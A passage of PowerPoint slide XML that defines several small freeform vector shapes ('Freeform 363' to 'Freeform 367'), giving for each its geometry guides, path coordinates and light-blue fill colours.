              <a:gd name="T5" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T8" fmla="*/ 0 w 12"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T10" fmla="*/ 0 w 12"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T12" fmla="*/ 0 w 12"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T35" fmla="*/ 0 h 56"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T37" fmla="*/ 0 h 56"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T39" fmla="*/ 0 h 56"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T41" fmla="*/ 0 h 56"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T43" fmla="*/ 0 h 56"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T45" fmla="*/ 0 h 56"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T47" fmla="*/ 0 h 56"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T49" fmla="*/ 0 h 56"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 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
              <a:gd name="T79" fmla="*/ 0 h 56"/>
              <a:gd name="T80" fmla="*/ 12 w 12"/>
              <a:gd name="T81" fmla="*/ 56 h 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 h="56">
                <a:moveTo>
                  <a:pt x="4" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="8CD8FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10282" name="Freeform 363"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1511300" y="7510463"/>
            <a:ext cx="22225" cy="104775"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T10" fmla="*/ 0 w 10"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T12" fmla="*/ 0 w 10"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T41" fmla="*/ 0 h 46"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T43" fmla="*/ 0 h 46"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T45" fmla="*/ 0 h 46"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T47" fmla="*/ 0 h 46"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 4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
              <a:gd name="T79" fmla="*/ 0 h 46"/>
              <a:gd name="T80" fmla="*/ 10 w 10"/>
              <a:gd name="T81" fmla="*/ 46 h 4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 h="46">
                <a:moveTo>
                  <a:pt x="4" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="A5EDFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10283" name="Freeform 364"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1516062" y="7524750"/>
            <a:ext cx="15875" cy="74613"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 33"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 33"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 33"/>
              <a:gd name="T6" fmla="*/ 0 w 7"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 33"/>
              <a:gd name="T8" fmla="*/ 0 w 7"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 33"/>
              <a:gd name="T10" fmla="*/ 0 w 7"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 33"/>
              <a:gd name="T12" fmla="*/ 0 w 7"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 33"/>
              <a:gd name="T14" fmla="*/ 0 w 7"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 33"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 33"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 33"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 33"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 33"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 33"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 33"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 33"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 33"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 33"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T35" fmla="*/ 0 h 33"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T37" fmla="*/ 0 h 33"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T39" fmla="*/ 0 h 33"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T41" fmla="*/ 0 h 33"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T43" fmla="*/ 0 h 33"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T45" fmla="*/ 0 h 33"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T47" fmla="*/ 0 h 33"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T49" fmla="*/ 0 h 33"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 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33"/>
              <a:gd name="T80" fmla="*/ 7 w 7"/>
              <a:gd name="T81" fmla="*/ 33 h 3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33">
                <a:moveTo>
                  <a:pt x="2" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10284" name="Freeform 365"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1730375" y="7450138"/>
            <a:ext cx="53975" cy="203200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T26" fmla="*/ 0 w 24"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T28" fmla="*/ 0 w 24"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T35" fmla="*/ 0 h 90"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T37" fmla="*/ 2147483647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90"/>
              <a:gd name="T59" fmla="*/ 24 w 24"/>
              <a:gd name="T60" fmla="*/ 90 h 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90">
                <a:moveTo>
                  <a:pt x="24" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="59B2FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10285" name="Freeform 366"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1733550" y="7466013"/>
            <a:ext cx="42862" cy="171450"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T1" fmla="*/ 0 h 76"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T3" fmla="*/ 0 h 76"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T26" fmla="*/ 0 w 19"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T28" fmla="*/ 0 w 19"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T30" fmla="*/ 0 w 19"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T35" fmla="*/ 0 h 76"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T37" fmla="*/ 0 h 7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76"/>
              <a:gd name="T59" fmla="*/ 19 w 19"/>
              <a:gd name="T60" fmla="*/ 76 h 7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76">
                <a:moveTo>
                  <a:pt x="19" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="68"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="72C6FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10286" name="Freeform 367"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1736725" y="7478713"/>
            <a:ext cx="34925" cy="142875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T1" fmla="*/ 0 h 63"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T24" fmla="*/ 0 w 15"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T26" fmla="*/ 0 w 15"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T28" fmla="*/ 0 w 15"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T30" fmla="*/ 0 w 15"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T35" fmla="*/ 0 h 63"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T37" fmla="*/ 0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63"/>
              <a:gd name="T59" fmla="*/ 15 w 15"/>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63">
                <a:moveTo>
                  <a:pt x="15" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="12"/>
